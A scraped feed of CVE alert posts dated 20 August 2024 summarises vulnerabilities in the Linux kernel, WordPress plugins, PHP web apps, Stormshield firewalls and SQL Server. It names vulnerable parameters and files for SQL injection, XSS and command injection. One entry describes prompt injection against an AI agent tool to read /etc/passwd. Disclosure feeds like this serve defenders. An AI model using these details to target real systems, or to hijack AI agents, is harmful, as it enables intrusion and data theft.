🚨 CVE-2024-43862In the Linux kernel, the following vulnerability has been resolved:net: wan: fsl_qmc_hdlc: Convert carrier_lock spinlock to a mutexThe carrier_lock spinlock protects the carrier detection. While it isheld, framer_get_status() is called which in turn takes a mutex.This is not correct and can lead to a deadlock.A run with PROVE_LOCKING enabled detected the issue: [ BUG: Invalid wait context ] ... c204ddbc (&framer->mutex){+.+.}-{3:3}, at: framer_get_status+0x40/0x78 other info that might help us debug this: context-{4:4} 2 locks held by ifconfig/146: #0: c0926a38 (rtnl_mutex){+.+.}-{3:3}, at: devinet_ioctl+0x12c/0x664 #1: c2006a40 (&qmc_hdlc->carrier_lock){....}-{2:2}, at: qmc_hdlc_framer_set_carrier+0x30/0x98Avoid the spinlock usage and convert carrier_lock to a mutex.🎖@cveNotify |
|
| 2024-08-20 23:37:24 |
🚨 CVE-2024-22281** UNSUPPORTED WHEN ASSIGNED ** The Apache Helix Front (UI) component contained a hard-coded secret, allowing an attacker to spoof sessions by generating their own fake cookies.This issue affects Apache Helix Front (UI): all versions.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-20 22:37:25 |
🚨 CVE-2024-43861In the Linux kernel, the following vulnerability has been resolved:net: usb: qmi_wwan: fix memory leak for not ip packetsFree the unused skb when not ip packets arrive.🎖@cveNotify |
|
| 2024-08-20 22:37:24 |
🚨 CVE-2024-43403Kanister is a data protection workflow management tool. The kanister has a deployment called default-kanister-operator, which is bound with a ClusterRole called edit via ClusterRoleBinding. The "edit" ClusterRole is one of Kubernetes default-created ClusterRole, and it has the create/patch/udpate verbs of daemonset resources, create verb of serviceaccount/token resources, and impersonate verb of serviceaccounts resources. A malicious user can leverage access the worker node which has this component to make a cluster-level privilege escalation.🎖@cveNotify |
|
| 2024-08-20 21:37:37 |
🚨 CVE-2024-42361Hertzbeat is an open source, real-time monitoring system. Hertzbeat 1.6.0 and earlier declares a /api/monitor/{monitorId}/metric/{metricFull} endpoint to download job metrics. In the process, it executes a SQL query with user-controlled data, allowing for SQL injection.🎖@cveNotify |
|
| 2024-08-20 21:37:31 |
🚨 CVE-2024-41658Casdoor is a UI-first Identity and Access Management (IAM) / Single-Sign-On (SSO) platform. In Casdoor 1.577.0 and earlier, he purchase URL that is created to generate a WechatPay QR code is vulnerable to reflected XSS. When purchasing an item through casdoor, the product page allows you to pay via wechat pay. When using wechat pay, a QR code with the wechat pay link is displayed on the payment page, hosted on the domain of casdoor. This page takes a query parameter from the url successUrl, and redirects the user to that url after a successful purchase. Because the user has no reason to think that the payment page contains sensitive information, they may share it with other or can be social engineered into sending it to others. An attacker can then craft the casdoor link with a special url and send it back to the user, and once payment has gone though an XSS attack occurs.🎖@cveNotify |
|
| 2024-08-20 21:37:30 |
🚨 CVE-2024-42581A Cross-Site Request Forgery (CSRF) in the component delete_group.php of Warehouse Inventory System v2.0 allows attackers to escalate privileges.🎖@cveNotify |
|
| 2024-08-20 21:37:29 |
🚨 CVE-2024-42574School Management System commit bae5aa was discovered to contain a SQL injection vulnerability via the medium parameter at attendance.php.🎖@cveNotify |
|
| 2024-08-20 21:37:26 |
🚨 CVE-2024-42558Hotel Management System commit 91caab8 was discovered to contain a SQL injection vulnerability via the book_id parameter at admin_modify_room.php.🎖@cveNotify |
|
| 2024-08-20 21:37:25 |
🚨 CVE-2024-30414Command injection vulnerability in the AccountManager module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-08-20 21:37:24 |
🚨 CVE-2024-28447Shenzhen Libituo Technology Co., Ltd LBT-T300-mini1 v1.2.9 was discovered to contain a buffer overflow via lan_ipaddr parameters at /apply.cgi.🎖@cveNotify |
|
| 2024-08-20 21:07:25 |
🚨 CVE-2024-6185A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC 1.0. Affected by this issue is the function get_ip_addr_details of the file /view/dhcp/dhcpConfig/commit.php. The manipulation of the argument ethname leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269156. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-20 21:07:24 |
🚨 CVE-2024-6183A vulnerability classified as problematic has been found in EZ-Suite EZ-Partner 5. Affected is an unknown function of the component Forgot Password Handler. The manipulation leads to basic cross site scripting. It is possible to launch the attack remotely. VDB-269154 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-20 20:07:26 |
🚨 CVE-2024-7917A vulnerability, which was classified as critical, has been found in DouPHP 1.7 Release 20220822. Affected by this issue is some unknown functionality of the file /admin/system.php of the component Favicon Handler. The manipulation of the argument site_favicon leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-20 20:07:25 |
🚨 CVE-2024-6331stitionai/devika main branch as of commit cdfb782b0e634b773b10963c8034dc9207ba1f9f is vulnerable to Local File Read (LFI) by Prompt Injection. The integration of Google Gimini 1.0 Pro with `HarmBlockThreshold.BLOCK_NONE` for `HarmCategory.HARM_CATEGORY_HATE_SPEECH` and `HarmCategory.HARM_CATEGORY_HARASSMENT` in `safety_settings` disables content protection. This allows malicious commands to be executed, such as reading sensitive file contents like `/etc/passwd`.🎖@cveNotify |
|
| 2024-08-20 20:07:24 |
🚨 CVE-2024-7444A vulnerability classified as critical was found in itsourcecode Ticket Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Login Page. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273529 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-20 19:37:43 |
🚨 CVE-2024-7901A vulnerability has been found in Scada-LTS 2.7.8 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Scada-LTS/app.shtm#/alarms/Scada of the component Message Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: A fix is planned for the upcoming release at the end of September 2024.🎖@cveNotify |
|
| 2024-08-20 19:37:42 |
🚨 CVE-2024-43852In the Linux kernel, the following vulnerability has been resolved:hwmon: (ltc2991) re-order conditions to fix off by one bugLTC2991_T_INT_CH_NR is 4. The st->temp_en[] array has LTC2991_MAX_CHANNEL(4) elements. Thus if "channel" is equal to LTC2991_T_INT_CH_NR then wehave read one element beyond the end of the array. Flip the conditionsaround so that we check if "channel" is valid before using it as an arrayindex.🎖@cveNotify |
|
| 2024-08-20 19:37:41 |
🚨 CVE-2024-7866In Xpdf 4.05 (and earlier), a PDF object loop in a pattern resource leads to infinite recursion and a stack overflow.🎖@cveNotify |
|
| 2024-08-20 19:37:37 |
🚨 CVE-2024-42680An issue in Super easy enterprise management system v.1.0.0 and before allows a local attacker to obtain the server absolute path by entering a single quotation mark.🎖@cveNotify |
|
| 2024-08-20 19:37:36 |
🚨 CVE-2024-7792A vulnerability was found in SourceCodester Task Progress Tracker 1.0. It has been classified as critical. Affected is an unknown function of the file /endpoint/delete-task.php. The manipulation of the argument task leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-20 19:37:31 |
🚨 CVE-2024-41727In BIG-IP tenants running on r2000 and r4000 series hardware, or BIG-IP Virtual Edition (VEs) using Intel E810 SR-IOV NIC, undisclosed traffic can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2024-08-20 19:37:30 |
🚨 CVE-2024-39383Acrobat Reader versions 20.005.30636, 24.002.20965, 24.002.20964, 24.001.30123 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-20 17:37:42 |
🚨 CVE-2024-42919eScan Management Console 14.0.1400.2281 is vulnerable to Incorrect Access Control via acteScanAVReport.🎖@cveNotify |
|
| 2024-08-20 17:37:41 |
🚨 CVE-2024-39791Stack-based buffer overflow vulnerabilities affecting Vonets industrial wifi bridge relays and wifi bridge repeaters, software versions 3.3.23.6.9 and prior, enable an unauthenticated remote attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-08-20 17:37:37 |
🚨 CVE-2024-41161Use of hard-coded credentials vulnerability affecting Vonets industrial wifi bridge relays and WiFi bridge repeaters, software versions 3.3.23.6.9 and prior, enables an unauthenticated remote attacker to bypass authentication using hard-coded administrator credentials. These accounts cannot be disabled.🎖@cveNotify |
|
| 2024-08-20 17:37:36 |
🚨 CVE-2023-28074Dell BSAFE Crypto-C Micro Edition, version 4.1.5, and Dell BSAFE Micro Edition Suite, versions 4.0 through 4.6.1 and version 5.0, contains an Out-of-bounds Read vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Information exposure.🎖@cveNotify |
|
| 2024-08-20 17:37:31 |
🚨 CVE-2024-38322IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.4 agent username and password error response discrepancy exposes product to brute force enumeration. IBM X-Force ID: 294869.🎖@cveNotify |
|
| 2024-08-20 17:37:30 |
🚨 CVE-2024-38458Xenforo before 2.2.16 allows code injection.🎖@cveNotify |
|
| 2024-08-20 17:37:26 |
🚨 CVE-2024-32921In lwis_initialize_transaction_fences of lwis_fence.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-20 17:37:25 |
🚨 CVE-2024-31705An issue in Infotel Conseil GLPI v.10.X.X and after allows a remote attacker to execute arbitrary code via the insufficient validation of user-supplied input.🎖@cveNotify |
|
| 2024-08-20 17:07:25 |
🚨 CVE-2024-42031Access permission verification vulnerability in the Settings module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-08-20 17:07:24 |
🚨 CVE-2024-42030Access permission verification vulnerability in the content sharing pop-up moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-08-20 16:37:45 |
🚨 CVE-2024-42001An improper authentication vulnerability affecting Vonets industrial wifi bridge relays and wifi bridge repeaters, software versions 3.3.23.6.9 and prior enables an unauthenticated remote attacker to bypass authentication via a specially crafted direct request when another user has an active session.🎖@cveNotify |
|
| 2024-08-20 16:37:44 |
🚨 CVE-2024-38891An issue in Horizon Business Services Inc. Caterease 16.0.1.1663 through 24.0.1.2405 and possibly later versions, allows a remote attacker to perform a Sniffing Network Traffic attack due to the cleartext transmission of sensitive information.🎖@cveNotify |
|
| 2024-08-20 16:37:43 |
🚨 CVE-2024-40778An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.6, iOS 17.6 and iPadOS 17.6, iOS 16.7.9 and iPadOS 16.7.9. Photos in the Hidden Photos Album may be viewed without authentication.🎖@cveNotify |
|
| 2024-08-20 16:37:39 |
🚨 CVE-2023-49221Precor touchscreen console P62, P80, and P82 could allow a remote attacker (within the local network) to bypass security restrictions, and access the service menu, because there is a hard-coded service code.🎖@cveNotify |
|
| 2024-08-20 16:37:38 |
🚨 CVE-2024-36779Sourcecodester Stock Management System v1.0 is vulnerable to SQL Injection via editCategories.php.🎖@cveNotify |
|
| 2024-08-20 16:37:37 |
🚨 CVE-2024-34051A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.🎖@cveNotify |
|
| 2024-08-20 16:37:33 |
🚨 CVE-2024-35354A vulnerability has been discovered in Diño Physics School Assistant version 2.3. The vulnerability impacts an unidentified code within the file /classes/Master.php?f=save_category. Manipulating the argument id can result in SQL injection.🎖@cveNotify |
|
| 2024-08-20 16:37:32 |
🚨 CVE-2024-35324Douchat 4.0.5 suffers from an arbitrary file upload vulnerability via Public/Plugins/webuploader/server/preview.php.🎖@cveNotify |
|
| 2024-08-20 16:37:31 |
🚨 CVE-2024-33808A SQL injection vulnerability in /model/get_timetable.php in campcodes Complete Web-Based School Management System 1.0 allows an attacker to execute arbitrary SQL commands via the id parameter.🎖@cveNotify |
|
| 2024-08-20 16:37:30 |
🚨 CVE-2024-36428OrangeHRM 3.3.3 allows admin/viewProjects sortOrder SQL injection.🎖@cveNotify |
|
| 2024-08-20 16:37:27 |
🚨 CVE-2024-36080Westermo EDW-100 devices through 2024-05-03 have a hidden root user account with a hardcoded password that cannot be changed. NOTE: this is a serial-to-Ethernet converter that should not be placed at the edge of the network.🎖@cveNotify |
|
| 2024-08-20 16:37:26 |
🚨 CVE-2023-48643Shrubbery tac_plus 2.x, 3.x. and 4.x through F4.0.4.28 allows unauthenticated Remote Command Execution. The product allows users to configure authorization checks as shell commands through the tac_plus.cfg configuration file. These are executed when a client sends an authorization request with a username that has pre-authorization directives configured. However, it is possible to inject additional commands into these checks because strings from TACACS+ packets are used as command-line arguments. If the installation lacks a a pre-shared secret (there is no pre-shared secret by default), then the injection can be triggered without authentication. (The attacker needs to know a username configured to use a pre-authorization command.) NOTE: this is related to CVE-2023-45239 but the issue is in the original Shrubbery product, not Meta's fork.🎖@cveNotify |
|
| 2024-08-20 16:07:44 |
🚨 CVE-2024-37336SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:43 |
🚨 CVE-2024-37332SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:42 |
🚨 CVE-2024-37330SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:38 |
🚨 CVE-2024-37329SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:37 |
🚨 CVE-2024-37326SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:36 |
🚨 CVE-2024-37324SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:32 |
🚨 CVE-2024-37322SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:31 |
🚨 CVE-2024-37320SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:30 |
🚨 CVE-2024-37319SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:26 |
🚨 CVE-2024-35271SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 16:07:25 |
🚨 CVE-2024-21449SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-20 15:07:43 |
🚨 CVE-2024-7252Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the cmdagent executable. By creating a symbolic link, an attacker can abuse the agent to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22831.🎖@cveNotify |
|
| 2024-08-20 15:07:42 |
🚨 CVE-2024-7250Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the cmdagent executable. By creating a symbolic link, an attacker can abuse the agent to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22829.🎖@cveNotify |
|
| 2024-08-20 15:07:38 |
🚨 CVE-2024-7248Comodo Internet Security Pro Directory Traversal Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the update mechanism. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-19055.🎖@cveNotify |
|
| 2024-08-20 15:07:37 |
🚨 CVE-2024-37856Cross Site Scripting vulnerability in Lost and Found Information System 1.0 allows a remote attacker to escalate privileges via the first, last, middle name fields in the User Profile page.🎖@cveNotify |
|
| 2024-08-20 15:07:36 |
🚨 CVE-2023-28616An issue was discovered in Stormshield Network Security (SNS) before 4.3.17, 4.4.x through 4.6.x before 4.6.4, and 4.7.x before 4.7.1. It affects user accounts for which the password has an equals sign or space character. The serverd process logs such passwords in cleartext, and potentially sends these logs to the Syslog component.🎖@cveNotify |
|
| 2024-08-20 15:07:33 |
🚨 CVE-2023-47091An issue was discovered in Stormshield Network Security (SNS) SNS 4.3.13 through 4.3.22 before 4.3.23, SNS 4.6.0 through 4.6.9 before 4.6.10, and SNS 4.7.0 through 4.7.1 before 4.7.2. An attacker can overflow the cookie threshold, making an IPsec connection impossible.🎖@cveNotify |
|
| 2024-08-20 15:07:32 |
🚨 CVE-2022-27812Flooding SNS firewall versions 3.7.0 to 3.7.29, 3.11.0 to 3.11.17, 4.2.0 to 4.2.10, and 4.3.0 to 4.3.6 with specific forged traffic, can lead to SNS DoS.🎖@cveNotify |
|
| 2024-08-20 15:07:31 |
🚨 CVE-2022-23989In Stormshield Network Security (SNS) before 3.7.25, 3.8.x through 3.11.x before 3.11.13, 4.x before 4.2.10, and 4.3.x before 4.3.5, a flood of connections to the SSLVPN service might lead to saturation of the loopback interface. This could result in the blocking of almost all network traffic, making the firewall unreachable. An attacker could exploit this via forged and properly timed traffic to cause a denial of service.🎖@cveNotify |
|
| 2024-08-20 15:07:26 |
🚨 CVE-2021-28962Stormshield Network Security (SNS) before 4.2.2 allows a read-only administrator to gain privileges via CLI commands.🎖@cveNotify |
|
| 2024-08-20 15:07:25 |
🚨 CVE-2021-27506The ClamAV Engine (version 0.103.1 and below) component embedded in Storsmshield Network Security (SNS) is subject to DoS in case of parsing of malformed png files. This affect Netasq versions 9.1.0 to 9.1.11 and SNS versions 1.0.0 to 4.2.0. This issue is fixed in SNS 3.7.19, 3.11.7 and 4.2.1.🎖@cveNotify |
|
| 2024-08-20 15:07:24 |
🚨 CVE-2021-3384A vulnerability in Stormshield Network Security could allow an attacker to trigger a protection related to ARP/NDP tables management, which would temporarily prevent the system to contact new hosts via IPv4 or IPv6. This affects versions 2.0.0 to 2.7.7, 2.8.0 to 2.16.0, 3.0.0 to 3.7.16, 3.8.0 to 3.11.4, and 4.0.0 to 4.1.5. Fixed in versions 2.7.8, 3.7.17, 3.11.5, and 4.2.0.🎖@cveNotify |
|
| 2024-08-20 14:07:40 |
🚨 CVE-2024-7686A vulnerability, which was classified as problematic, was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. This affects an unknown part of the file register_case.php. The manipulation of the argument title/description/opposite_lawyer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-20 14:07:39 |
🚨 CVE-2024-7684A vulnerability classified as problematic was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected by this vulnerability is an unknown functionality of the file add_act.php. The manipulation of the argument aname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-20 14:07:35 |
🚨 CVE-2024-6405The Floating Social Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the floating_social_buttons_option() function. This makes it possible for unauthenticated attackers to update the plugins settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-20 14:07:34 |
🚨 CVE-2022-48743In the Linux kernel, the following vulnerability has been resolved:net: amd-xgbe: Fix skb data length underflowThere will be BUG_ON() triggered in include/linux/skbuff.h leading tointermittent kernel panic, when the skb length underflow is detected.Fix this by dropping the packet if such length underflows are seenbecause of inconsistencies in the hardware descriptors.🎖@cveNotify |
|
| 2024-08-20 14:07:33 |
🚨 CVE-2022-48742In the Linux kernel, the following vulnerability has been resolved:rtnetlink: make sure to refresh master_dev/m_ops in __rtnl_newlink()While looking at one unrelated syzbot bug, I found the replay logicin __rtnl_newlink() to potentially trigger use-after-free.It is better to clear master_dev and m_ops inside the loop,in case we have to replay it.🎖@cveNotify |
|
| 2024-08-20 13:37:43 |
🚨 CVE-2024-42562Pharmacy Management System commit a2efc8 was discovered to contain a SQL injection vulnerability via the invoice_number parameter at preview.php.🎖@cveNotify |
|
| 2024-08-20 13:37:42 |
🚨 CVE-2024-42559An issue in the login component (process_login.php) of Hotel Management System commit 79d688 allows attackers to authenticate without providing a valid password.🎖@cveNotify |
|
| 2024-08-20 13:37:38 |
🚨 CVE-2024-42558Hotel Management System commit 91caab8 was discovered to contain a SQL injection vulnerability via the book_id parameter at admin_modify_room.php.🎖@cveNotify |
|
| 2024-08-20 13:37:37 |
🚨 CVE-2024-42556Hotel Management System commit 91caab8 was discovered to contain a SQL injection vulnerability via the room_type parameter at admin_room_removed.php.🎖@cveNotify |
|
| 2024-08-20 13:37:36 |
🚨 CVE-2024-42554Hotel Management System commit 91caab8 was discovered to contain a SQL injection vulnerability via the room_type parameter at admin_room_added.php.🎖@cveNotify |
|
| 2024-08-20 13:37:32 |
🚨 CVE-2024-42552Hotel Management System commit 91caab8 was discovered to contain a SQL injection vulnerability via the book_id parameter at admin_room_history.php.🎖@cveNotify |
|
| 2024-08-20 12:37:26 |
🚨 CVE-2024-41698Priority – CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-08-20 12:37:25 |
🚨 CVE-2024-41697Priority - CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)🎖@cveNotify |
|
| 2024-08-20 12:37:24 |
🚨 CVE-2024-25009Ericsson Packet Core Controller (PCC) contains a vulnerability in Access and Mobility Management Function (AMF) where improper input validation can lead to denial of service which may result in service degradation.🎖@cveNotify |
|
| 2024-08-20 12:07:25 |
🚨 CVE-2020-7357Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page. This issue affects several branches and versions of the CMS application, including CME-SE, CMS-60, CMS-40, CMS-20, and CMS version 8.2, 8.0, and 7.5.🎖@cveNotify |
|
| 2024-08-20 11:37:25 |
🚨 CVE-2024-7054The Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘close_text’ parameter in all versions up to, and including, 1.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-20 10:37:25 |
🚨 CVE-2024-28829Least privilege violation and reliance on untrusted inputs in the mk_informix Checkmk agent plugin before Checkmk 2.3.0p12, 2.2.0p32, 2.1.0p47 and 2.0.0 (EOL) allows local users to escalate privileges.🎖@cveNotify |
|
| 2024-08-20 10:37:24 |
🚨 CVE-2024-21689This High severity RCE (Remote Code Execution) vulnerability CVE-2024-21689 was introduced in versions 9.1.0, 9.2.0, 9.3.0, 9.4.0, 9.5.0, and 9.6.0 of Bamboo Data Center and Server.This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.6, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.Atlassian recommends that Bamboo Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Bamboo Data Center and Server 9.2: Upgrade to a release greater than or equal to 9.2.17 Bamboo Data Center and Server 9.6: Upgrade to a release greater than or equal to 9.6.5See the release notes ([https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]). You can download the latest version of Bamboo Data Center and Server from the download center ([https://www.atlassian.com/software/bamboo/download-archives]).This vulnerability was reported via our Bug Bounty program.🎖@cveNotify |
|
| 2024-08-20 08:37:25 |
🚨 CVE-2024-38808In Spring Framework versions 5.3.0 - 5.3.38 and older unsupported versions, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial of service (DoS) condition.Specifically, an application is vulnerable when the following is true: * The application evaluates user-supplied SpEL expressions.🎖@cveNotify |
|
| 2024-08-20 06:37:25 |
🚨 CVE-2024-5576The Tutor LMS Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'course_carousel_skin' attribute within the plugin's Course Carousel widget in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-20 06:37:24 |
🚨 CVE-2024-43688cron/entry.c in vixie cron before 9cc8ab1, as used in OpenBSD 7.4 and 7.5, allows a heap-based buffer underflow and memory corruption. NOTE: this issue was introduced during a May 2023 refactoring.🎖@cveNotify |
|
| 2024-08-20 05:37:25 |
🚨 CVE-2024-26306iPerf3 before 3.17, when used with OpenSSL before 3.2.0 as a server with RSA authentication, allows a timing side channel in RSA decryption operations. This side channel could be sufficient for an attacker to recover credential plaintext. It requires the attacker to send a large number of messages for decryption, as described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario.🎖@cveNotify |
|
| 2024-08-20 05:37:24 |
🚨 CVE-2018-10126ijg-libjpeg before 9d, as used in tiff2pdf (from LibTIFF) and other products, does not check for a NULL pointer at a certain place in jpeg_fdct_16x16 in jfdctint.c.🎖@cveNotify |
|
| 2024-08-20 04:37:31 |
🚨 CVE-2024-7780The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to generic SQL Injection via the id parameter in versions 2.0 to 2.13.9 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-20 04:37:30 |
🚨 CVE-2024-7775The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary JavaScript file uploads due to missing input validation in the addCustomCode function in versions 2.0 to 2.13.9. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary JavaScript files to the affected site's server.🎖@cveNotify |
|
| 2024-08-20 04:37:26 |
🚨 CVE-2024-6575The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘res_width_value’ parameter within the plugin's tp_page_scroll widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-20 04:37:25 |
🚨 CVE-2022-1206The AdRotate Banner Manager – The only ad manager you'll need plugin for WordPress is vulnerable to arbitrary file uploads due to missing file extension sanitization in the adrotate_insert_media() function in all versions up to, and including, 5.13.2. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files with double extensions on the affected site's server which may make remote code execution possible. This is only exploitable on select instances where the configuration will execute the first extension present.🎖@cveNotify |
|
| 2024-08-20 02:37:33 |
🚨 CVE-2024-7850The BP Profile Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.7.5. This is due to missing or incorrect nonce validation on the bps_ajax_field_selector(), bps_ajax_template_options(), and bps_ajax_field_row() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-20 02:37:26 |
🚨 CVE-2024-7827The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to boolean-based SQL Injection via the ‘model_number’ parameter in all versions up to, and including, 5.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-20 02:37:25 |
🚨 CVE-2024-5939The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'setup_wizard' function in all versions up to, and including, 3.13.0. This makes it possible for unauthenticated attackers to read the setup wizard administrative pages.🎖@cveNotify |
|
| 2024-08-20 02:37:24 |
🚨 CVE-2024-5932The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.🎖@cveNotify |
|
| 2024-08-20 01:37:25 |
🚨 CVE-2024-7942A vulnerability has been found in SourceCodester Leads Manager Tool 1.0 and classified as problematic. This vulnerability affects unknown code of the file update-leads.php. The manipulation of the argument phone_number leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-20 01:37:24 |
